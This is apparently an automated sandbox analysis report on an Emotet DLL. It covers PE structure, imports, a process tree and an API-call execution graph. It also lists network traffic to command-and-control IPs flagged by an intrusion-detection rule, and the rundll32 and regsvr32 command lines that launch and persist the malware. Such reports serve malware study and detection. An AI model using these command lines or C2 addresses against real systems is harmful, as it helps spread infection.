                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [00033EADh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], ecx
                                                                                                      dec eax
                                                                                                      lea edx, dword ptr [ebx+08h]
                                                                                                      xor ecx, ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx], ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx+08h], ecx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [eax+08h]
                                                                                                      Programming Language:
                                                                                                      • [EXP] VS2015 UPD3.1 build 24215
                                                                                                      • [RES] VS2015 UPD3 build 24213
                                                                                                      • [LNK] VS2015 UPD3.1 build 24215
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x7cda00x58.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7cdf80x78.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x870000x1e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x820000x192c.pdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x66c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x7a4100x1c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7a4300x94.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x380000x370.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x36fd50x37000False0.38967507102272725data5.930785005703424IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x380000x4597a0x45a00False0.6705214878815081data6.27546801719427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x7e0000x33940xc00False0.18294270833333334DOS executable (block device driver \337-\231+])2.573523630872546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .pdata0x820000x192c0x1a00False0.4794170673076923data5.1711441720039435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gfids0x840000xdc0x200False0.244140625Spectrum .TAP data "6 " - BASIC program1.1531659578770692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gxfg0x850000x10000x1000False0.44091796875data5.088628746947821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .gehcont0x860000xc0x200False0.0390625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x870000x1e00x200False0.52734375data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x880000x66c0x800False0.537109375data4.9054360857170005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_MANIFEST0x870600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, SetFilePointerEx, ExitProcess, GetStdHandle, GetProcessHeap, CreateFileW, CloseHandle, GetStringTypeW, LCMapStringW, GetFileType, VirtualAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RaiseException, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, WriteConsoleW
                                                                                                      USER32.dllEndPaint, BeginPaint, InvalidateRect, GetMessageW, DefWindowProcW, CloseTouchInputHandle, GetTouchInputInfo, DestroyWindow, MessageBoxW, CreateWindowExW, RegisterClassExW, LoadStringW, ShowWindow, DispatchMessageW, RegisterTouchWindow, MessageBoxA, UnregisterTouchWindow, TranslateAcceleratorW, TranslateMessage, LoadCursorW, PostQuitMessage, UpdateWindow
                                                                                                      GDI32.dllPolyline, LineTo, CreatePen, MoveToEx, DeleteObject, SelectObject
                                                                                                      ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                                                                      CRYPT32.dllCryptStringToBinaryA
                                                                                                      NameOrdinalAddress
                                                                                                      DllRegisterServer10x180013f70
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      192.168.2.3115.178.55.2249698802404304 11/13/22-18:01:59.432679TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34969880192.168.2.3115.178.55.22
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 13, 2022 18:13:25.039700985 CET4970080192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:13:25.334048033 CET8049700115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:13:25.840825081 CET4970080192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:13:26.134670973 CET8049700115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:13:26.653392076 CET4970080192.168.2.3115.178.55.22
                                                                                                      Nov 13, 2022 18:13:26.947299004 CET8049700115.178.55.22192.168.2.3
                                                                                                      Nov 13, 2022 18:13:33.445684910 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:33.609828949 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:33.610146999 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:33.615015984 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:33.779772997 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:33.794851065 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:33.794980049 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:33.795121908 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:33.842473984 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:34.007100105 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:34.007740974 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:34.200831890 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:35.848098040 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:35.848213911 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:36.012561083 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:36.012594938 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:36.640882015 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:36.685441971 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:39.644001007 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:39.644136906 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:39.644254923 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:39.644386053 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:39.644486904 CET497018080192.168.2.3172.105.115.71
                                                                                                      Nov 13, 2022 18:13:39.808562994 CET808049701172.105.115.71192.168.2.3
                                                                                                      Nov 13, 2022 18:13:39.808581114 CET808049701172.105.115.71192.168.2.3

                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:18:12:36
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll"
                                                                                                      Imagebase:0x7ff6df450000
                                                                                                      File size:139776 bytes
                                                                                                      MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.279054004.000001B000100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:1
                                                                                                      Start time:18:12:37
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff745070000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:2
                                                                                                      Start time:18:12:37
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                                                                                                      Imagebase:0x7ff707bb0000
                                                                                                      File size:273920 bytes
                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:3
                                                                                                      Start time:18:12:37
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.276448850.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.275144208.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:4
                                                                                                      Start time:18:12:37
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                                                                                                      Imagebase:0x7ff6bc4b0000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.273153768.000001E1DA4C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.272245824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:5
                                                                                                      Start time:18:12:38
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer
                                                                                                      Imagebase:0x7ff6bc4b0000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.275026847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.276265667.0000025817DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:6
                                                                                                      Start time:18:12:42
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AEDSEwQF\PBid.dll"
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.651143469.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.659348475.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:7
                                                                                                      Start time:18:12:43
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SwzTtIAmqdPBna\Ntrjg.dll"
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:8
                                                                                                      Start time:18:12:43
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GQmyGle\ScmiHVadtyVtThN.dll"
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:9
                                                                                                      Start time:18:12:45
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NTIufvJuRVPL\QYaWGzhqdb.dll"
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:19
                                                                                                      Start time:18:13:45
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\AEDSEwQF\PBid.dll
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.422527105.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.423610573.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                      Target ID:20
                                                                                                      Start time:18:13:52
                                                                                                      Start date:13/11/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\Zyymwn\eKUKMW.dll"
                                                                                                      Imagebase:0x7ff781fc0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.1%
                                                                                                        Dynamic/Decrypted Code Coverage:3%
                                                                                                        Signature Coverage:10.3%
                                                                                                        Total number of Nodes:701
                                                                                                        Total number of Limit Nodes:11
                                                                                                        execution_graph 17124 7ffc123daa18 17125 7ffc123daa63 17124->17125 17129 7ffc123daa27 __vcrt_getptd_noexit 17124->17129 17134 7ffc123db420 17125->17134 17127 7ffc123daa4a RtlAllocateHeap 17128 7ffc123daa61 17127->17128 17127->17129 17129->17125 17129->17127 17131 7ffc123d97ec 17129->17131 17137 7ffc123d9828 17131->17137 17143 7ffc123dba4c GetLastError 17134->17143 17136 7ffc123db429 17136->17128 17142 7ffc123dbd28 EnterCriticalSection 17137->17142 17139 7ffc123d9835 17140 7ffc123dbd7c new LeaveCriticalSection 17139->17140 17141 7ffc123d97fa 17140->17141 17141->17129 17144 7ffc123dba8d FlsSetValue 17143->17144 17146 7ffc123dba70 17143->17146 17145 7ffc123dba9f 17144->17145 17157 7ffc123dba7d SetLastError 17144->17157 17160 7ffc123daad0 17145->17160 17146->17144 17146->17157 17150 7ffc123dbacc FlsSetValue 17153 7ffc123dbad8 FlsSetValue 17150->17153 17154 7ffc123dbaea 17150->17154 17151 7ffc123dbabc FlsSetValue 17152 7ffc123dbac5 17151->17152 17167 7ffc123da9dc 17152->17167 17153->17152 17173 7ffc123db640 17154->17173 17157->17136 17165 7ffc123daae1 __vcrt_getptd_noexit 17160->17165 17161 7ffc123dab32 17164 7ffc123db420 _set_errno_from_matherr 10 API calls 17161->17164 17162 7ffc123dab16 RtlAllocateHeap 17163 7ffc123dab30 17162->17163 17162->17165 17163->17150 17163->17151 17164->17163 17165->17161 17165->17162 17166 7ffc123d97ec new 2 API calls 17165->17166 17166->17165 17168 7ffc123da9e1 RtlReleasePrivilege 17167->17168 17172 7ffc123daa10 17167->17172 17169 7ffc123da9fc GetLastError 17168->17169 17168->17172 17170 7ffc123daa09 Concurrency::details::SchedulerProxy::DeleteThis 17169->17170 17171 7ffc123db420 _set_errno_from_matherr 9 API calls 17170->17171 17171->17172 17172->17157 17178 7ffc123db518 17173->17178 17190 7ffc123dbd28 EnterCriticalSection 17178->17190 17192 1b000130000 17195 1b00013015a 17192->17195 17193 1b00013033f GetNativeSystemInfo 17194 1b000130377 VirtualAlloc 17193->17194 17197 1b0001308eb 17193->17197 17200 1b000130395 17194->17200 17195->17193 17195->17197 17196 1b000130873 17196->17197 17198 1b0001308c6 RtlAvlRemoveNode 17196->17198 17198->17197 17199 1b00013084b VirtualProtect 17199->17200 17200->17196 17200->17199 17201 18000be34 17204 180005db4 17201->17204 17203 18000bf4c 17205 180005df9 17204->17205 17206 1800060dd Process32FirstW 17205->17206 17207 180005e61 17205->17207 17206->17205 17207->17203 17208 7ffc123d4394 17209 7ffc123d43ba 17208->17209 17210 7ffc123d43f1 17209->17210 17211 7ffc123d43d1 dllmain_raw 17209->17211 17213 7ffc123d43c2 17209->17213 17210->17213 17259 7ffc123e3fb0 17210->17259 17212 7ffc123d43e4 17211->17212 17211->17213 17225 7ffc123d4194 17212->17225 17217 7ffc123d443e 17217->17213 17218 7ffc123d4194 84 API calls 17217->17218 17220 7ffc123d4454 17218->17220 17219 7ffc123e3fb0 75 API calls 17221 7ffc123d4424 17219->17221 17220->17213 17222 7ffc123d445e dllmain_raw 17220->17222 17223 7ffc123d4194 84 API calls 17221->17223 17222->17213 17224 7ffc123d4431 dllmain_raw 17223->17224 17224->17217 17226 7ffc123d419c 17225->17226 17234 7ffc123d41d5 __scrt_acquire_startup_lock 17225->17234 17227 7ffc123d41c9 17226->17227 17228 7ffc123d41a1 17226->17228 17293 7ffc123d3f18 17227->17293 17229 7ffc123d41a6 17228->17229 17230 7ffc123d41bc __scrt_dllmain_crt_thread_attach 17228->17230 17232 7ffc123d41ab 17229->17232 17308 7ffc123d3e58 17229->17308 17233 7ffc123d41ba 17230->17233 17231 7ffc123d432e 17231->17210 17232->17210 17233->17210 17234->17231 17237 7ffc123d4359 17234->17237 17239 7ffc123d4944 __scrt_fastfail 7 API calls 17234->17239 17320 7ffc123d3ed4 17237->17320 17239->17237 17240 7ffc123d435e 17325 7ffc123d3f04 17240->17325 17241 7ffc123d4206 __scrt_acquire_startup_lock 17243 7ffc123d4232 17241->17243 17251 7ffc123d420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17241->17251 17313 7ffc123d4944 IsProcessorFeaturePresent 17241->17313 17301 7ffc123d3e18 17243->17301 17244 7ffc123d4369 __scrt_release_startup_lock 17329 7ffc123d40f0 17244->17329 17248 7ffc123d4241 _RTC_Initialize 17248->17251 17304 7ffc123d416c 17248->17304 17251->17210 17253 7ffc123d425b 17254 7ffc123d416c shared_ptr 50 API calls 17253->17254 17255 7ffc123d4267 __scrt_initialize_default_local_stdio_options 17254->17255 17256 7ffc123da908 17 API calls 17255->17256 17257 7ffc123d427f 17256->17257 17257->17251 17258 7ffc123d4283 __scrt_dllmain_after_initialize_c 17257->17258 17258->17251 17260 7ffc123e3fe9 17259->17260 17261 7ffc123e3fee __scrt_fastfail __std_exception_destroy new 17259->17261 17671 7ffc123d3a70 17260->17671 17516 7ffc123e9970 17261->17516 17265 7ffc123e91fd 17266 7ffc123e9970 49 API calls 17265->17266 17267 7ffc123e9217 std::_Container_base12::~_Container_base12 17266->17267 17639 7ffc123e9410 17267->17639 17271 7ffc123e9268 17272 7ffc123d1540 47 API calls 17271->17272 17273 7ffc123e9275 17272->17273 17274 7ffc123e9382 __scrt_fastfail 17273->17274 17275 7ffc123e9282 17273->17275 17647 7ffc123e9510 17274->17647 17655 7ffc123e9f00 17275->17655 17279 7ffc123e92bb LoadStringW LoadStringW 17660 7ffc123e3ed0 LoadCursorW RegisterClassExW 17279->17660 17280 7ffc123e929f MessageBoxA 17280->17260 17283 7ffc123e9510 48 API calls 17283->17260 17284 7ffc123e9308 17661 7ffc123e3cb0 CreateWindowExW 17284->17661 17287 7ffc123e9320 CoUninitialize 17287->17260 17288 7ffc123e932d GetMessageW 17289 7ffc123e9344 TranslateAcceleratorW 17288->17289 17290 7ffc123e9372 CoUninitialize 17288->17290 17291 7ffc123e935a TranslateMessage DispatchMessageW 17289->17291 17292 7ffc123e9370 17289->17292 17290->17260 17291->17292 17292->17288 17294 7ffc123d3f3a __isa_available_init 17293->17294 17333 7ffc123d6ac0 17294->17333 17297 7ffc123d3f43 17297->17241 17420 7ffc123d3f64 17301->17420 17303 7ffc123d3e23 17303->17248 17425 7ffc123d411c 17304->17425 17306 7ffc123d4175 17307 7ffc123d4b40 InitializeSListHead 17306->17307 17440 7ffc123da86c 17308->17440 17314 7ffc123d4969 __scrt_fastfail 17313->17314 17315 7ffc123d4985 RtlCaptureContext RtlLookupFunctionEntry 17314->17315 17316 7ffc123d49ae RtlVirtualUnwind 17315->17316 17317 7ffc123d49ea __scrt_fastfail 17315->17317 17316->17317 17318 7ffc123d4a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17317->17318 17319 7ffc123d4a6e 17318->17319 17319->17243 17321 7ffc123d3edd __scrt_acquire_startup_lock 17320->17321 17323 7ffc123d3ef1 17321->17323 17508 7ffc123da334 17321->17508 17323->17240 17326 7ffc123d3f0f 17325->17326 17327 7ffc123d70b0 __vcrt_uninitialize_ptd 6 API calls 17326->17327 17328 7ffc123d6b45 17327->17328 17328->17244 17331 7ffc123d4101 __scrt_uninitialize_crt 17329->17331 17330 7ffc123d4113 17330->17231 17331->17330 17332 7ffc123d6b1c __vcrt_uninitialize 8 API calls 17331->17332 17332->17330 17334 7ffc123d6ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17333->17334 17353 7ffc123d7974 17334->17353 17337 7ffc123d3f3f 17337->17297 17341 7ffc123da844 17337->17341 17342 7ffc123de02c 17341->17342 17343 7ffc123d3f4c 17342->17343 17404 7ffc123ddfb0 17342->17404 17343->17297 17345 7ffc123d6b1c 17343->17345 17346 7ffc123d6b24 17345->17346 17347 7ffc123d6b35 17345->17347 17348 7ffc123d70b0 __vcrt_uninitialize_ptd 6 API calls 17346->17348 17347->17297 17349 7ffc123d6b29 17348->17349 17350 7ffc123d79bc __vcrt_uninitialize_locks DeleteCriticalSection 17349->17350 17351 7ffc123d6b2e 17350->17351 17416 7ffc123d7de4 17351->17416 17354 7ffc123d797c 17353->17354 17356 7ffc123d79ad 17354->17356 17357 7ffc123d6ad3 17354->17357 17370 7ffc123d7d20 17354->17370 17358 7ffc123d79bc __vcrt_uninitialize_locks DeleteCriticalSection 17356->17358 17357->17337 17359 7ffc123d7070 17357->17359 17358->17357 17385 7ffc123d7bbc 17359->17385 17361 7ffc123d7080 17362 7ffc123d6ae0 17361->17362 17390 7ffc123d7cb8 17361->17390 17362->17337 17366 7ffc123d79bc 17362->17366 17364 7ffc123d709d 17364->17362 17395 7ffc123d70b0 17364->17395 17367 7ffc123d79e7 17366->17367 17368 7ffc123d79ca DeleteCriticalSection 17367->17368 17369 7ffc123d79eb 17367->17369 17368->17367 17369->17337 17375 7ffc123d79f4 17370->17375 17373 7ffc123d7d77 InitializeCriticalSectionAndSpinCount 17374 7ffc123d7d63 17373->17374 17374->17354 17376 7ffc123d7a5a 17375->17376 17381 7ffc123d7a55 17375->17381 17376->17373 17376->17374 17377 7ffc123d7b22 17377->17376 17379 7ffc123d7b31 GetProcAddress 17377->17379 17378 7ffc123d7a8d LoadLibraryExW 17380 7ffc123d7ab3 GetLastError 17378->17380 17378->17381 17379->17376 17382 7ffc123d7b49 17379->17382 17380->17381 17383 7ffc123d7abe LoadLibraryExW 17380->17383 17381->17376 17381->17377 17381->17378 17384 7ffc123d7b00 FreeLibrary 17381->17384 17382->17376 17383->17381 17384->17381 17386 7ffc123d79f4 try_get_function 5 API calls 17385->17386 17387 7ffc123d7be8 17386->17387 17388 7ffc123d7bff TlsAlloc 17387->17388 17389 7ffc123d7bf0 17387->17389 17388->17389 17389->17361 17391 7ffc123d79f4 try_get_function 5 API calls 17390->17391 17392 7ffc123d7ceb 17391->17392 17393 7ffc123d7d04 TlsSetValue 17392->17393 17394 7ffc123d7cf3 17392->17394 17393->17394 17394->17364 17396 7ffc123d70c4 17395->17396 17397 7ffc123d70bf 17395->17397 17396->17362 17399 7ffc123d7c10 17397->17399 17400 7ffc123d79f4 try_get_function 5 API calls 17399->17400 17401 7ffc123d7c3b 17400->17401 17402 7ffc123d7c51 TlsFree 17401->17402 17403 7ffc123d7c43 17401->17403 17402->17403 17403->17396 17415 7ffc123dbd28 EnterCriticalSection 17404->17415 17406 7ffc123ddfc0 17407 7ffc123e060c 53 API calls 17406->17407 17408 